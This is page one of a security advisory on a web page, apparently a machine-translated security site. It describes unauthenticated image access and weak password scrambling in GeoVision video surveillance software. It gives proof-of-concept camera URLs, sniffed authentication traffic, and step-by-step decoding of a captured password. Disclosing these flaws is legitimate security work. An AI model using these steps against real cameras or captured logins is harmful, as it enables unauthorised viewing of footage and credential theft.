Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > System crack > Content
Hot Articles
GeoVision Digital Video
Adobe Acrobat and the Re
Samba group_mapping.tdb/
The Sleuth Kit - UNIX-ba
Marvell 88W8361P-BEM1 ch
CS-Cart core / user.php
phpBB Small ShoutBox mod
Outlook Web Access for E
FlexCell Grid ActiveX co
PHP error_log bypasses t
Apple Bonjour for Window
nginx file type error pa
DedeCMS V5.5 Final GetWe
Details of PHP code exec
The VMware 2008-0014 ren
Recommend Articles
Mozilla the Firefox 2.0.
DC++ many long-distance
VLC the media player WAV
The Wireshark 1.0.1 edit
Wordpress XML-RPC connec
ServerView Web connectio
PCRE the pcre_compile.c
phpMyAdmin long-distance
Panda the ActiveScan lon
BlueZ the SDP load handl
1024 CMS many documents
WeFi journal file local
vBulletin adminlog.php r
Microsoft Windows DNS se
Adobe RoboHelp Server he
New Articles
DiY - brief loophole ana
Freefloat FTP Server ove
I can with Apache endeav
HP - UX NFS/ONCplus unkn
HP - UX FTPD remote deni
HP - UX DCE can send acr
HP - UX 'useradd' local
HP - UX swagentd remote
HP - UX Numbers local de
HP - UX System under the
HP - UX 'FTPD' unknown r
HP TCP/IP Services for c
From Solaris NFS pages f
From Solaris XScreenSave
Sun Solaris Auditing Ext
GeoVision Digital Video Surveillance System Multiple Privilege Escalation
  Add date: 03/04/2009   Publishing date: 03/04/2009   Hits: 1170
Total 2 pages, Current page:1, Jump to page:
 

Vulnerable Systems:
 * GeoVision Digital Video Surveillance System version 7.0 and prior

Privilege Escalation 1:
When the GeoVision software is set to create JPEG images for use via the JPEG Image Viewer it can be seen that no authentication is required to view the JPEG images.

Using GeoVisions own demonstration as an example the following URLs can be used to access images. This is true even for servers who specify that a username and password is required for authentication. In the current GeoVision demonstration only a username is required to access footage. This method works on GeoVision systems which are configured to create JPEG images. It will also work on GeoVision systems which are not configured with the 'Enhanced Network Security' feature. This is understood to be the default setting.

Proof of Concept:
http://webcam.geovision.com.tw/cam0.jpg
...
http://webcam.geovision.com.tw/cam3.jpg

Privilege Escalation 2:
During the authentication phase using the live playback client it was seen that the username part of the authentication component is passed in plain text. In this partial dump taken using tcpflow the username is seen to be 'gvUser'.

Network dump of an authentication attempt:
--------------------- Network traffic sniffer ---------------------
192.168.105.136:01187-192.168.105.130:00514: ....
192.168.105.130:04550-192.168.105.136:01186: RDY.
192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser.
192.168.105.130:04550-192.168.105.136:01186: ...
192.168.105.136:01186-192.168.105.130:04550: 2.
-------------------------------------------------------------------

A simple transformation of the password based on hex values for ASCII characters is used to scramble the password. This scrambling is simple to do in reverse, as seen in the example below.

Sniff from network:
--------------------- Network traffic sniffer ---------------------
192.168.105.130:04550-192.168.105.136:01186: RDY.
192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser.
192.168.105.130:04550-192.168.105.136:01186: ...
-------------------------------------------------------------------

Here we see the username 'gvUser', still in plain text and the scrambled password '7d6a6666636e'. In order to go to the from the scrambled string to the original password a few simple steps are performed.

Split the string into pairs of hex strings:
0x7d
0x6a
0x66
0x66
0x63
0x6e

Each pair represents one character in the original password, so this scrambled string is for a password of 6 characters.

Iterate through the pairs subtracting a number from each pair starting with 0x6, for the first character as there are 6 characters in this password.

0x7d - 0x6 = 77
0x6a - 0x5 = 65
0x66 - 0x4 = 62
0x66 - 0x3 = 63
0x63 - 0x2 = 61
0x6e - 0x1 = 6d

Then use an ASCII table to translate into characters

0x77 = w
0x65 = e
0x62 = b
0x63 = c
0x61 = a
0x6d = m

So the original password was 'webcam'.

This issue is encountered for all the authentication options below:
Mpeg4 Encoder Viewer
56kMpegView0.htm

 

Other pages: : 1 * 2 * Next>>
Prev:Cisco Internetwork Operating System IPv6 DoS and Arbitrary Code Execution Next:Pandora - Distributed Multirole Monitoring System

Comment:

Category: Home > System crack
Home